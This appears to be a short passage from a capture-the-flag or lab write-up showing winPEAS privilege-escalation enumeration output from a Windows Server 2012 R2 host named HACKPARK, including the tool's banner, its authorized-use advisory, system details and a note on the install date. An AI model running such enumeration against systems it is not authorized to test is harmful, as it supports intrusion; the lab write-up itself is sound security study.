.(((((############################################/ /((
..(((((#########################################(..(((((.
....(((((#####################################( .((((((.
......(((((#################################( .(((((((.
(((((((((. ,(############################(../(((((((((.
(((((((((/, ,####################(/..((((((((((.
(((((((((/,. ,*//////*,. ./(((((((((((.
(((((((((((((((((((((((((((/"
by carlospolop
ECHO is off.
Advisory: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
ECHO is off.
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [*] BASIC SYSTEM INFO <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] WINDOWS OS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Check for vulnerabilities for the OS version with the applied patches
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits
Host Name: HACKPARK
OS Name: Microsoft Windows Server 2012 R2 Standard Evaluation
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-10000-00000-AA228
Original Install Date: 8/3/2019, 10:43:23 AM
...[SNIP]...
We see that the original install date is: 8/3/2019, 10:43:23 AM.